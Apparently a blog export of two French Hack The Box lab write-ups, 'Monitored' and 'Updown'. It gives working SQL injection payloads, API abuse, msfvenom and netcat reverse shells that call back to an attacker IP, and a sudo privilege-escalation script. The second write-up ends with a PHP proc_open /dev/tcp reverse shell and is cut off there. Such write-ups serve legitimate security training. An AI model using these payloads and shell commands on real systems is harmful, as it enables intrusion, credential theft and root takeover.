[{"content":" Machine name OS IP Difficulty Monitored Linux 10.10.11.248 Medium Users 1 svc : XjH7VCehowpR1xZB Enumeration nmap TCP 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 $ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.248 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 61e2e7b41b5d46dc3b2f9138e66dc5ff (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABg | 256 2973c5a58daa3f60a94aa3e59f675c93 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBbeArqg4dgxZEFQzd3zpod1RYGUH6Jfz6tcQjHsVTvRNnUzqx5nc7gK2kUUo1HxbEAH+cPziFjNJc6q7vvpzt4= | 256 6d7af9eb8e45c2026ad58d4db3a3376f (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB5o+WJqnyLpmJtLyPL+tEUTFbjMZkx3jUUFqejioAj7 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.56 |_http-title: Did not follow redirect to https://nagios.monitored.htb/ | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.56 (Debian) 389/tcp open ldap syn-ack ttl 63 OpenLDAP 2.2.X - 2.3.X 443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.56 ((Debian)) |_http-title: Nagios XI | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK/emailAddress=support@monitored.htb/localityName=Bournemouth | Issuer: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK/emailAddress=support@monitored.htb/localityName=Bournemouth | Public Key type: rsa10.10.11.248 | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2023-11-11T21:46:55 | Not valid after: 2297-08-25T21:46:55 | MD5: b36a55607a5f047d983864504d67cfe0 | SHA-1: 610938448c36b08b0ae8a132971c8e89cfac2b5b | -----BEGIN CERTIFICATE----- | MIID/zCCAuegAwIBAgIUVhOvMcK6dv/Kvzplbf6IxOePX3EwDQYJKoZIhvcNAQEL | 4c8NpU/6egay1sl2ZrQuO8feYA== |_-----END CERTIFICATE----- |_http-server-header: Apache/2.4.56 (Debian) |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 5667/tcp open tcpwrapped syn-ack ttl 63 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.93%E=4%D=11/10%OT=22%CT=1%CU=37179%PV=Y%DS=2%DC=T%G=Y%TM=691219 OS:%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Foothold SNMP Avec un scan nmap sur les ports UDP, on comprend que le port SNMP est ouvert. Avec nmap, on effectue plusieurs commandes SNMP et on trouve des credentials:\nsvc / \u0026ldquo;XjH7VCehowpR1xZB\u0026rdquo; 1 2 3 4 5 $ nmap -vv --reason -Pn -T4 -sU -sV -p 161 --script=\u0026#34;banner,(snmp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)\u0026#34; -oN \u0026#34;/opt/my-resources/setup/zsh/results/10.10.11.248/scans/udp161/udp_161_snmp-nmap.txt\u0026#34; -oX \u0026#34;/opt/my-resources/setup/zsh/results/10.10.11.248/scans/udp161/xml/udp_161_snmp_nmap.xml\u0026#34; 10.10.11.248 | 631: | Name: sh | Path: /bin/sh | Params: -c sleep 30; sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB Nagios XI - Cannot login Le user/pass ne fonctionne pas \u0026ldquo;The specified user account has been disabled or does not exist.\u0026rdquo;\nSQL Injection En cherchant sur internet, on trouve la CVE suivante (que l\u0026rsquo;on teste à l\u0026rsquo;aveugle car on ne connait pas la version de Nagios XI qui est installée) : CVE-2023-40931\nA SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1 Host: nagios.monitored.htb Cookie: nagiosxi=lmeogjafdeiommcbnhu1k7s9lh User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Priority: u=0, i Te: trailers Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 204 action=acknowledge_banner_message\u0026amp;token=9f86697945abf56d35a7ee14233bef5b481a51be\u0026amp;id=3+OR+(SELECT+7402+FROM(SELECT+COUNT(*),CONCAT(@@version,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a) ----------------------- \u0026lt;p\u0026gt;\u0026lt;pre\u0026gt;SQL Error [nagiosxi] : Duplicate entry \u0026#39;10.5.23-MariaDB-0+deb11u11\u0026#39; for key \u0026#39;group_key\u0026#39;\u0026lt;/pre\u0026gt;\u0026lt;/p\u0026gt; {\u0026#34;message\u0026#34;:\u0026#34;Failed to acknowledge message.\u0026#34;,\u0026#34;msg_type\u0026#34;:\u0026#34;error\u0026#34;} On récupère le hachage Admin, que l\u0026rsquo;on ne réussit pas à déchiffrer.\n1 2 3 4 5 6 7 action=acknowledge_banner_message\u0026amp;token=9f86697945abf56d35a7ee14233bef5b481a51be\u0026amp;id=3+OR+(SELECT+7402+FROM(SELECT+COUNT(*),CONCAT((select+username+from+xi_users+LIMIT+1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a) \u0026gt;\u0026gt;\u0026gt; SQL Error [nagiosxi] : Duplicate entry \u0026#39;nagiosadmin1\u0026#39; for key \u0026#39;group_key\u0026#39; # --\u0026gt; nagiosadmin (le \u0026#34;1\u0026#34; est raouté par FLOOR(...)) action=acknowledge_banner_message\u0026amp;token=9f86697945abf56d35a7ee14233bef5b481a51be\u0026amp;id=3+OR+(SELECT+7402+FROM(SELECT+COUNT(*),CONCAT((select+password+from+xi_users+LIMIT+1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a) \u0026gt;\u0026gt;\u0026gt; SQL Error [nagiosxi] : Duplicate entry \u0026#39;$2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C1\u0026#39; for key \u0026#39;group_key\u0026#39; J\u0026rsquo;ai tenté de bruteforce le hash mais ça n\u0026rsquo;a pas fonctionné : j\u0026rsquo;avais oublié que chaque résultat de requete SQL rajoutait un \u0026ldquo;1\u0026rdquo; à la fin\u0026hellip; Donc mon hash était en vérité:\n$2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C \u0026lt;\u0026mdash;- sans la 1 !! (Mais ça n\u0026rsquo;a pas fonctionné de toute manière)\nxi_users table:\nuser_id, username, password, name, email, backend_ticket, enabled, api_key, api_enabled, login_attempts, last_attempt, last_password_change, last_login, last_edited, \u0026hellip;\nJ\u0026rsquo;ai récupérer les colonnes de la table xi_users en utilisant ce type de requêtes :\n1 2 3 4 5 select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where table_name=\u0026#39;xi_users\u0026#39; limit 1 select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where table_name=\u0026#39;xi_users\u0026#39; limit 1,1 select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where table_name=\u0026#39;xi_users\u0026#39; limit 2,1 select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where table_name=\u0026#39;xi_users\u0026#39; limit 3,1 ... On réussi à récupérer la clé API de l\u0026rsquo;administateur :\n1 2 3 4 5 # If you have \u0026#34;...\u0026#34; because your string is very long select api_key from xi_users limit 1 \u0026gt;\u0026gt;\u0026gt; \u0026#39;IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9C...\u0026#39; # You can use SUBSTRING multiple times to dump the string select SUBSTRING(api_key, 1, 10) from xi_users limit 1 IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL\nEn récupérant les requête API utilisé sur une autre exploit disponible (récente), j\u0026rsquo;ai pu créer un nouvel utilisateur Administrateur :\n1 2 3 4 POST /nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL\u0026amp;pretty=1 HTTP/1.1 Host: 10.10.11.248 username=Lu6Wk\u0026amp;password=DxMkC\u0026amp;name=Lu6Wk\u0026amp;email=Lu6Wk%40mail.com\u0026amp;auth_level=admin On peut alors ensuite se connecter sur l\u0026rsquo;interface graphique de nagios XI avec ce nouvel utilisateur et créer des commandes sur cette page :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 GET /nagiosxi/includes/components/ccm/index.php?cmd=view\u0026amp;type=command\u0026amp;page=1 ------------------------ https://nagios.monitored.htb/nagiosxi/includes/components/ccm/index.php?cmd=modify\u0026amp;type=command\u0026amp;id=158\u0026amp;page=1\u0026amp;returnUrl=index.php%3Fcmd%3Dview%26type%3Dcommand%26page%3D1 \u0026gt;\u0026gt;\u0026gt; Command Line : cat user.txt ------------------------ GET /nagiosxi/includes/components/nagioscorecfg/applyconfig.php ------------------ GET /nagiosxi/includes/components/ccm/command_test.php?cmd=test\u0026amp;mode=test\u0026amp;cid=158\u0026amp;nsp=443df18d3ff18d83e02a7bb13fc42870f7b73046851cecd9e301897d427f8a5e HTTP/1.1 Host: nagios.monitored.htb User-Agent: python-requests/2.32.4 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive Cookie: nagiosxi=8pi6o9q2kph72ugu230v9vjq2g \u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt; HTTP/1.1 200 OK ... [nagios@monitored ~]$ cat user.txt 213b4331f50e5f1072d301938db28331 Stable Shell 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 # Reverse Shell Linux ELF $ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.14 LPORT=1337 -f elf \u0026gt; shell [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 74 bytes Final size of elf file: 194 bytes $ http-server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.11.248 - - [11/Nov/2025 19:58:51] \u0026#34;GET /shell HTTP/1.1\u0026#34; 200 - ------------------------------ Through Burp, I executed 3 commands in a row : - curl http://10.10.14.14/shell -O shell - chmod 777 shell - ./shell ------------------------------ $ nc -lnvp 1337 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::1337 Ncat: Listening on 0.0.0.0:1337 Ncat: Connection from 10.10.11.248. Ncat: Connection from 10.10.11.248:53330. python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; nagios@monitored:/home/nagios$ export TERM=xterm export TERM=xterm nagios@monitored:/home/nagios$ ^Z [1] + 68520 suspended nc -lnvp 1337 $ stty raw -echo;fg [1] + 68520 continued nc -lnvp 1337 nagios@monitored:/home/nagios$ whoami nagios nagios@monitored:/home/nagios$ ls cookie.txt shell user.txt nagios@monitored:/home/nagios$ cat user.txt 213b4331f50e5f1072d301938db28331 SSH to nagios 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 nagios@monitored:/home/nagios$ cd .ssh nagios@monitored:/home/nagios/.ssh$ ssh-keygen -t rsa Generating public/private rsa key pair. Enter file in which to save the key (/home/nagios/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/nagios/.ssh/id_rsa Your public key has been saved in /home/nagios/.ssh/id_rsa.pub The key fingerprint is: SHA256:2NBZpIJ+HjRmFS93s8DRbV8sAp4rqh+3kPsTvXVzki0 nagios@monitored The key s randomart image is: +---[RSA 3072]----+ ...... +----[SHA256]-----+ nagios@monitored:/home/nagios/.ssh$ cat id_rsa.pub ssh-rsa AAAAB3NzaC....id8HqID90SBHsANCYUhofRFH5rCG3alGvYyYNMu+Wk= nagios@monitored nagios@monitored:/home/nagios/.ssh$ mv id_rsa.pub authorized_keys nagios@monitored:/home/nagios/.ssh$ ls authorized_keys id_rsa nagios@monitored:/home/nagios/.ssh$ cat id_rsa -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5v.......c0Btb25pdG9yZWQBAg== -----END OPENSSH PRIVATE KEY----- -------------------- # Copy the id_rsa to my machine and connect to nagios using SSH $ vim nagios.key $ chmod 600 nagios.key $ ssh nagios@10.10.11.248 -i nagios.key Linux monitored 5.10.0-28-amd64 #1 SMP Debian 5.10.209-2 (2024-01-31) x86_64 ... Last login: Wed Mar 27 10:32:47 2024 from 10.10.14.23 nagios@monitored:~$ whoami nagios nagios@monitored:~$ cat user.txt 213b....8331 Privilege Escalation CVE-2024-24402 Je lance une recherche sur google :\n\u0026ldquo;exploit nagiosxi script as root\u0026rdquo; ce qui m\u0026rsquo;amène vers ce lien : https://gist.github.com/sec-fortress/6d128a5e290e873be4c2ca27b6579eca ou encore la recherche :\n\u0026ldquo;cve nagioxi priv esc\u0026rdquo; qui m\u0026rsquo;amène vers ce lien, expliquant la même CVE : https://github.com/MAWK0235/CVE-2024-24402 En faisant sudo -l, on se rend compte qu\u0026rsquo;on peut executer beaucoup de binaires en tant que root avec sudo. En regardant de plus près les scripts, il ne s\u0026rsquo;agit que de scripts de nagiosxi qui n\u0026rsquo;ont pas subis de modification.\nCe qui veut signifie que s\u0026rsquo;il existe un moyen d\u0026rsquo;exploiter ces binaires, il existe probablement une CVE sur internet. Et si ne n\u0026rsquo;est pas le cas, ils ne sont pas surement pas exploitables.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 nagios@monitored:~$ sudo -l Matching Defaults entries for nagios on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin User nagios may run the following commands on localhost: (root) NOPASSWD: /etc/init.d/nagios start (root) NOPASSWD: /etc/init.d/nagios stop (root) NOPASSWD: /etc/init.d/nagios restart (root) NOPASSWD: /etc/init.d/nagios reload (root) NOPASSWD: /etc/init.d/nagios status (root) NOPASSWD: /etc/init.d/nagios checkconfig (root) NOPASSWD: /etc/init.d/npcd start (root) NOPASSWD: /etc/init.d/npcd stop (root) NOPASSWD: /etc/init.d/npcd restart (root) NOPASSWD: /etc/init.d/npcd reload (root) NOPASSWD: /etc/init.d/npcd status (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php * (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php * (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/migrate/migrate.php * (root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh (root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh (root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh * (root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh * (root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh * Voici ce que contient le fichier executable nous permettant d\u0026rsquo;exploiter /usr/local/nagiosxi/scripts/manage_services.sh pour devenir root :\nexploit.sh 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 #!/bin/bash # Create npcd script echo \u0026#34;#!/bin/bash\u0026#34; \u0026gt; /tmp/npcd echo \u0026#34;nc -e /bin/bash 10.10.14.14 4445\u0026#34; \u0026gt;\u0026gt; /tmp/npcd # Grant executable permissions on the npcd script chmod +x /tmp/npcd 2\u0026gt;/dev/null # Stop the npcd service sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd # Replace original npcd script cp /tmp/npcd /usr/local/nagios/bin/npcd 2\u0026gt;/dev/null echo \u0026#34;[+] Start Up your listener\u0026#34; sleep 1 echo \u0026#34;[+] nc -lvnp 4445\u0026#34; sleep 15 echo \u0026#34;[+] Expect your shellzz xD\u0026#34; # start service to recieve reverse shell sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd sleep 5 echo \u0026#34;[+] done\u0026#34; Il faut donc remplacer le binaire ntpd par un faux contenant un reverse shell, puis redemarrer le service en utilisant le script manage_services.sh avec sudo.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 nagios@monitored:~$ ./exploit.sh [+] Start Up your listener [+] nc -lvnp 4445 [+] Expect your shellzz xD [+] done ------------------------- nc -lnvp 4445 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::4445 Ncat: Listening on 0.0.0.0:4445 Ncat: Connection from 10.10.11.248. Ncat: Connection from 10.10.11.248:40642. whoami root cd /root cat root.txt cf92....0a0a ","date":"2025-11-12T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/monitored-htb/","title":"HTB | Monitored"},{"content":" Machine name OS IP Difficulty Updown Linux 10.10.11.177 Medium Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 $ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.177 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 9e1f98d7c8ba61dbf149669d701702e7 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDl7j17X/EWcm1MwzD7sKOFZyTUggWH1RRgwFbAK+B6R28x47OJjQW8VO4tCjTyvqKBzpgg7r98xNEykmvnMr0V9eUhg6zf04GfS/gudDF3Fbr3XnZOsrMmryChQdkMyZQK1HULbqRij1tdHaxbIGbG5CmIxbh69mMwBOlinQINCStytTvZq4btP5xSMd8pyzuZdqw3Z58ORSnJAorhBXAmVa9126OoLx7AzL0aO3lqgWjo/wwd3FmcYxAdOjKFbIRiZK/f7RJHty9P2WhhmZ6mZBSTAvIJ36Kb4Z0NuZ+ztfZCCDEw3z3bVXSVR/cp0Z0186gkZv8w8cp/ZHbtJB/nofzEBEeIK8gZqeFc/hwrySA6yBbSg0FYmXSvUuKgtjTgbZvgog66h+98XUgXheX1YPDcnUU66zcZbGsSM1aw1sMqB1vHhd2LGeY8UeQ1pr+lppDwMgce8DO141tj+ozjJouy19Tkc9BB46FNJ43Jl58CbLPdHUcWeMbjwauMrw0= | 256 c21cfe1152e3d7e5f759186b68453f62 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKMJ3/md06ho+1RKACqh2T8urLkt1ST6yJ9EXEkuJh0UI/zFcIffzUOeiD2ZHphWyvRDIqm7ikVvNFmigSBUpXI= | 256 5f6e12670a66e8e2b761bec4143ad38e (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL1VZrZbtNuK2LKeBBzfz0gywG4oYxgPl+s5QENjani1 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Is my Website up ? | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) Foothold siteisup.htb - Port 80 Subdomain dev.siteisup.htb On trouve une sous-domaine, mais aucune page ne semble accessible (\u0026ldquo;forbidden\u0026rdquo;).\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 gobuster vhost -u \u0026#34;siteisup.htb\u0026#34; -w `fzf-wordlists` --append-domain =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://siteisup.htb [+] Method: GET [+] Threads: 10 [+] Wordlist: /opt/lists/seclists/Discovery/DNS/subdomains-top1million-110000.txt [+] User Agent: gobuster/3.6 [+] Timeout: 10s [+] Append Domain: true =============================================================== Starting gobuster in VHOST enumeration mode =============================================================== Found: dev.siteisup.htb Status: 403 [Size: 281] dev/.git - git-dumper On trouve une dossier dev/.git :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 dirsearch -u http://siteisup.htb/dev _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289 Target: http://siteisup.htb/ [00:47:20] Scanning: dev/ [00:47:22] 301 - 315B - /dev/.git -\u0026gt; http://siteisup.htb/dev/.git/ [00:47:22] 200 - 3KB - /dev/.git/ [00:47:22] 200 - 772B - /dev/.git/branches/ [00:47:22] 200 - 298B - /dev/.git/config [00:47:22] 200 - 73B - /dev/.git/description ... Dans le .git, on trouve un fichier .htaccess nous indiquant qu\u0026rsquo;un header spécifique permettrait de débloquer l\u0026rsquo;accès à certaines pages.\n1 2 3 4 5 6 7 8 $ git-dumper http://siteisup.htb/dev/ ./git-dump ... $ cd git-dump $ cat .htaccess SetEnvIfNoCase Special-Dev \u0026#34;only4dev\u0026#34; Required-Header Order Deny,Allow Deny from All Allow from env=Required-Header En essayant d\u0026rsquo;accéder à dev.siteisup.htb en ajoutant le header, on obtient l\u0026rsquo;accès à ce vhost !\nchecker.php On trouve un fichier changelog.txt indiquant qu\u0026rsquo;une option nous permettant d\u0026rsquo;upload des fichiers existe. changelog.txt\n1 2 3 4 5 6 7 8 9 10 cat changelog.txt Beta version 1- Check a bunch of websites. -- ToDo: 1- Multithreading for a faster version :D. 2- Remove the upload option. 3- New admin panel. En analysant la page disponible sur dev.siteisup.htb et le fichier checker.php récupérer dans le .git, on comprend qu\u0026rsquo;il s\u0026rsquo;agit bien de la meme page.\nCette page semble contenir une vulnérabilité de type File Upload, nous permettant eventuellement d\u0026rsquo;executer du code PHP.\nFile Upload - PHP RCE La requete suivante permet d\u0026rsquo;uploader un fichier PHP avec l\u0026rsquo;extension .phar, qui sera executé correctement comme du php :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 POST / HTTP/1.1 Host: dev.siteisup.htb Special-Dev: only4dev User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=----geckoformboundary5c49bfd8a8fdd6fcf6070b52067a09e8 Content-Length: 652 Origin: http://dev.siteisup.htb Connection: keep-alive Referer: http://dev.siteisup.htb Upgrade-Insecure-Requests: 1 Priority: u=0, i ------geckoformboundary5c49bfd8a8fdd6fcf6070b52067a09e8 Content-Disposition: form-data; name=\u0026#34;file\u0026#34;; filename=\u0026#34;shell.phar\u0026#34; Content-Type: application/x-php http://google.com http://siteisup.com http://10.10.10.10 http://google.com http://google.com http://siteisup.com http://10.10.10.10 http://google.com http://google.com http://siteisup.com http://10.10.10.10 http://google.com \u0026lt;?php echo file_get_contents( \u0026#34;/etc/passwd\u0026#34; ); ?\u0026gt; ------geckoformboundary5c49bfd8a8fdd6fcf6070b52067a09e8 Content-Disposition: form-data; name=\u0026#34;check\u0026#34; Check ------geckoformboundary5c49bfd8a8fdd6fcf6070b52067a09e8-- Le code source de checker.php récupérer dans le .git, nous montre que les fichiers sont uploader dans un dossier du nom de:\nmd5(time())\nOn a donc créer le code bash suivant, afin de retrouver rapidement le fichier shell.phar : md5.sh\n1 2 3 4 5 6 7 8 9 10 11 12 #!/bin/bash timestamp=$(date +%s) for i in {1..10}; do t=$(($timestamp-$i)) md5=$(echo -n $t | md5sum | cut -d\u0026#39; \u0026#39; -f1) #echo $md5 url=\u0026#39;http://dev.siteisup.htb/uploads/\u0026#39;$md5\u0026#39;/\u0026#39;$1 echo \u0026#34;curl \u0026#34;$url\u0026#34; -H \u0026#39;Special-Dev: only4dev\u0026#39; -i\u0026#34; curl $url -H \u0026#39;Special-Dev: only4dev\u0026#39; -i done Ce code Bash génère 10 noms de dossiers possible pour les 10 dernières secondes écoulées, puis effectuer des requêtes curl avec ces 10 dossiers vers le fichier shell.phar.\nLors de l\u0026rsquo;execution de notre requpête Burp, il suffit ensuite d\u0026rsquo;executer notre script Bash qui va retrouver notre fichier shell.phar et executer le code PHP présent. ATTENTION, dans la requete Burp, il faut rajouter beaucoup de :\nhttp://google.com http://google.com \u0026hellip;\nau début de la requête.\nEn effet, le fichier shell.phar est créer uniquement le temps de vérification des URL par le checker.php. Plus on met d\u0026rsquo;URL, plus le temps d\u0026rsquo;execution est long et notre fichier n\u0026rsquo;est pas supprimé.\nDans un premier temps, on a afficher /etc/passwd :\n./md5.sh shell.phar\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin sshd:x:109:65534::/run/sshd:/usr/sbin/nologin landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:111:1::/var/cache/pollinate:/bin/false systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false developer:x:1002:1002::/home/developer:/bin/bash Reverse Shell - proc_open En regardant la sortie de phpinfo(), on découvre qu\u0026rsquo;une liste de fonctions est bloqué:\nsystem, shell_exec, exec\u0026hellip; Les fonctions utilisées habituellement pour executer des commandes et obtenir un reverse shell ne fonctionnent pas.\nCependant, après quelques recherches on trouve le fonction proc_open qui n\u0026rsquo;est pas bloqué et permet d\u0026rsquo;executer du code :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 \u0026lt;?php $descriptorspec = array( 0 =\u0026gt; array(\u0026#34;pipe\u0026#34;, \u0026#34;r\u0026#34;), 1 =\u0026gt; array(\u0026#34;pipe\u0026#34;, \u0026#34;w\u0026#34;), 2 =\u0026gt; array(\u0026#34;pipe\u0026#34;, \u0026#34;w\u0026#34;) ); $cmd = \u0026#34;bash -c \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.14/4444 0\u0026gt;\u0026amp;1\u0026#39;\u0026#34;; $process = proc_open($cmd, $descriptorspec, $pipes); if (is_resource($process)) { fclose($pipes[0]); echo stream_get_contents($pipes[1]); fclose($pipes[1]); echo stream_get_contents($pipes[2]); 